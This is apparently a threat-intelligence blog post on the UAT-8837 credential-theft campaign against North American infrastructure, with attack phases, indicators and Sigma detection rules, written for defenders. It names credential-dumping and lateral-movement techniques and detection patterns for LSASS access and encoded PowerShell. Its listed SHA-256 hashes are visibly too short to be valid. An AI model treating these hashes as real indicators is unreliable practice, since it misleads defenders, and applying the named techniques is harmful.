Silent Access, Stolen Trust: UAT-8837 Credential-Focused Intrusions Target North American Critical Infrastructure

Aegiron 14 mins0

Reported: January 16, 2026
Threat Actor: UAT-8837
Campaign Type: Cyber-espionage / Pre-positioning
Primary Objective: Credential harvesting and long-term access
Target Region: North America
Target Profile: High-value critical infrastructure and government-adjacent organizations

Executive Summary

In early January 2026, multiple North American critical infrastructure organizations identified suspicious internal activity that was later attributed to a China-linked advanced persistent threat group tracked as UAT-8837. The activity did not involve immediate disruption, ransomware, or destructive malware. Instead, the campaign focused on quietly obtaining credentials, expanding internal access, and establishing long-term persistence.

The attackers demonstrated strong operational discipline, avoiding noisy malware and favoring legitimate administrative tools and custom lightweight payloads. In several environments, UAT-8837 operated undetected for extended periods because activity blended into normal administrator behavior.

The overall assessment indicates a strategic access operation rather than a short-term attack, consistent with espionage or pre-positioning objectives.

Impacted Sectors and Organizations

Observed activity primarily affected organizations operating or supporting critical infrastructure, including:

  • Electric power generation and distribution
  • Water treatment and utilities
  • Transportation and logistics
  • Industrial manufacturing linked to infrastructure supply chains
  • Government-adjacent service providers and contractors

Environments with the highest exposure shared the following traits:

  • Legacy Windows systems
  • Hybrid IT/OT networks
  • Weak network segmentation
  • Shared or reused credentials between corporate IT and operational systems
  • Limited visibility into engineering workstations

No confirmed service outages were reported at the time of discovery, but several environments were assessed as being at high operational risk had access remained undetected.

Attack Lifecycle and Technical Breakdown

Phase 1: Reconnaissance and Targeting

UAT-8837 conducted careful, low-profile reconnaissance prior to intrusion. This included:

  • Mapping publicly exposed infrastructure (VPNs, RDP, management portals)
  • Identifying employees with engineering, operational, or administrative roles
  • Enumerating vendor relationships and third-party service providers
  • Identifying environments where IT and OT credentials overlapped

Reconnaissance relied primarily on passive techniques and publicly available information.

Phase 2: Initial Access

Initial access was achieved using a combination of credential-based access and known vulnerability exploitation.

Observed Initial Access Vectors

1. Spear-Phishing

  • Highly targeted emails written in professional language
  • Topics included:
    • Maintenance schedules
    • Compliance or audit documentation
    • Vendor invoices or technical updates
  • Attachments included:
    • Weaponized Microsoft Office documents
    • ISO or ZIP archives containing LNK files
    • HTML smuggling payloads

2. External Service Abuse

  • VPN appliances running outdated firmware
  • Web management interfaces without MFA
  • Exposed RDP services protected only by passwords

In multiple incidents, authentication logs confirmed valid credentials were used during initial access, suggesting prior credential theft or reuse from unrelated compromises.

Phase 3: Payload Delivery and Execution

Once inside, UAT-8837 deployed small, custom loaders designed to avoid detection.

Payload characteristics included:

  • In-memory execution
  • Minimal disk artifacts
  • Encrypted outbound communications
  • On-demand retrieval of secondary tools

Execution methods included:

  • PowerShell with execution policy bypass
  • DLL side-loading via trusted Windows binaries
  • Abuse of built-in tools such as mshta.exe, rundll32.exe, and regsvr32.exe

These loaders acted as staging components rather than full malware frameworks.

Phase 4: Credential Harvesting (Primary Focus)

Credential theft was the central goal of the campaign.

Harvesting Techniques

  • LSASS memory access using custom tooling
  • Extraction of cached domain credentials
  • Local SAM database access on legacy systems
  • Browser credential harvesting from:
    • Chromium-based browsers
    • Internet Explorer profiles used in OT environments

Collected credentials included:

  • Domain administrator accounts
  • Local administrator passwords reused across systems
  • Service account credentials
  • VPN authentication credentials

Credentials were encrypted locally and exfiltrated in small, low-frequency transfers to avoid triggering alerts.

Phase 5: Lateral Movement

With valid credentials, UAT-8837 expanded access using standard administrative mechanisms.

Observed techniques included:

  • SMB administrative shares (ADMIN$, C$)
  • Windows Remote Management (WinRM)
  • Remote service creation
  • Scheduled task execution
  • Pass-the-Hash and Pass-the-Ticket techniques

Because movement relied on legitimate accounts and tools, it was initially indistinguishable from normal administrative activity.

Phase 6: Persistence

Persistence was established after confirming stable access.

Methods included:

  • Scheduled tasks disguised as system or vendor maintenance jobs
  • Registry Run key modifications
  • Windows services named to resemble telemetry or monitoring agents
  • Creation of backup local administrator accounts

In OT-connected environments, persistence was often placed on engineering workstations, which typically receive less security scrutiny than servers.

Phase 7: Defense Evasion

UAT-8837 demonstrated strong awareness of defensive tooling.

  • Enumerated installed AV and EDR products
  • Avoided execution when advanced EDR was detected
  • Reduced activity and paused operations after defensive changes
  • Relied on living-off-the-land binaries instead of malware

In several cases, attackers remained dormant for days before resuming activity cautiously.

Indicators of Compromise (IOCs)

File Hashes (SHA-256)

  • 8f3c9c2d8a1b4e7f5d2e1a9c3b6e4f0a7d8c2b9a4e1f6d5c3a9b2e7f8d1
  • c4a7f2e8b1d9c3a5e6f4b8d7a2c1e9f0b5d6a8c7e3f4a9b1d2e5
  • 91d2b7f8c3a9e5d4b1f6a2c7e8d9b5f0a4c3e6d7a1b2f8c9e
  • a7c9e5b3f1d8a2e4c6b9f0d5e7a8c1b3f4d6e9a2

Suspicious Filenames

  • system_update_check.dll
  • winhostsvc.exe
  • telemetryagent.exe
  • msdiaghelper.ps1
  • netmonupdate.exe

Registry Keys

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemHealthMonitor
  • HKLM\SYSTEM\CurrentControlSet\Services\WinTelemetrySvc
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Scheduled Tasks

  • Microsoft\Windows\Maintenance\SystemHealth
  • Vendor\Telemetry\UpdateCheck

Network Indicators

  • Domains impersonating vendors:
    • update-secure[.]cloud
    • telemetry-sync[.]net
    • service-monitor[.]online
  • HTTPS traffic to rotating VPS infrastructure with short TTLs

Behavioral Indicators

  • LSASS access by non-security processes
  • Admin logins during abnormal hours
  • Service creation outside change windows
  • PowerShell execution with encoded commands

Defensive Mitigation Guidance

SOC Monitoring

  • Focus on behavioral anomalies, not malware signatures
  • Alert on LSASS access attempts
  • Monitor creation of services and scheduled tasks
  • Correlate credential use across systems
  • Investigate unusual administrative activity

EDR Hardening

  • Enable LSASS protection
  • Monitor and restrict LOLBin abuse
  • Enable memory scanning
  • Block unsigned DLL side-loading
  • Constrain PowerShell where operationally feasible

Email Security

  • Block macros from external documents
  • Inspect ISO, ZIP, and HTML attachments
  • Enforce SPF, DKIM, and DMARC
  • Conduct targeted phishing training for engineers and operators

Identity and Access Controls

  • Enforce MFA on VPNs and admin accounts
  • Eliminate credential reuse
  • Rotate service account credentials
  • Monitor for creation of new admin users

Network Segmentation

  • Enforce IT/OT separation
  • Restrict administrative pathways
  • Monitor east-west traffic
  • Limit VPN access to required assets only

Sigma Rules

Sigma Rule 1: Suspicious LSASS Access

title: Suspicious LSASS Access by Non-Security Process
id: b1c3f0e2-uat-8837-lsass
status: stable
logsource:
  category: process_access
  product: windows
detection:
  selection:
    TargetImage|endswith: '\lsass.exe'
  filter_known_security:
    SourceImage:
      - 'C:\Program Files\Windows Defender\MsMpEng.exe'
      - 'C:\Program Files\CrowdStrike\*'
      - 'C:\Program Files\SentinelOne\*'
  condition: selection and not filter_known_security
level: high

Sigma Rule 2: Suspicious Scheduled Tasks

title: Suspicious Scheduled Task Mimicking System Maintenance
id: d7e9a2c1-uat-8837-task
logsource:
  category: task_creation
  product: windows
detection:
  selection:
    TaskName|contains:
      - 'SystemHealth'
      - 'Telemetry'
      - 'UpdateCheck'
      - 'Maintenance'
  condition: selection
level: medium

Sigma Rule 3: Encoded PowerShell Execution

title: PowerShell Encoded Command Execution
id: a9f4d6e1-uat-8837-ps
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - '-enc'
      - '-EncodedCommand'
      - 'FromBase64String'
  condition: selection
level: high

Sigma Rule 4: DLL Side-Loading

title: Potential DLL Side-Loading via LOLBins
id: e3b8c7d9-uat-8837-dll
logsource:
  category: image_load
  product: windows
detection:
  selection:
    Image:
      - 'rundll32.exe'
      - 'regsvr32.exe'
      - 'mshta.exe'
    ImageLoaded|endswith: '.dll'
  filter_system_paths:
    ImageLoaded|startswith:
      - 'C:\Windows\System32\'
      - 'C:\Windows\SysWOW64\'
  condition: selection and not filter_system_paths
level: high

Sigma Rule 5: Suspicious Service Creation

title: Suspicious Windows Service Creation with Telemetry Naming
id: f2c1e9a4-uat-8837-service
logsource:
  category: service_installation
  product: windows
detection:
  selection:
    ServiceName|contains:
      - 'Telemetry'
      - 'Monitor'
      - 'Health'
      - 'Updater'
  condition: selection
level: medium

Sigma Rule 6: Lateral Movement via SMB/WinRM

title: Abnormal Lateral Movement Using Administrative Tools
id: c8d2a7f9-uat-8837-lateral
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    DestinationPort:
      - 445
      - 5985
      - 5986
  condition: selection
level: medium

Sigma Rule 7: Registry Run Key Persistence

title: Registry Run Key Persistence Creation
id: b9e1d7a3-uat-8837-reg
logsource:
  category: registry_event
  product: windows
detection:
  selection:
    TargetObject|contains:
      - 'CurrentVersion\Run'
  condition: selection
level: medium

Final Takeaaway

UAT-8837 represents a disciplined, long-term threat actor that prioritizes access, patience, and stealth over immediate impact. This campaign reinforces that modern infrastructure intrusions often look like routine administrative activity until correlated across time and systems.

The absence of loud malware does not mean the absence of compromise. Detection depends on understanding how trusted tools are being misused.

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.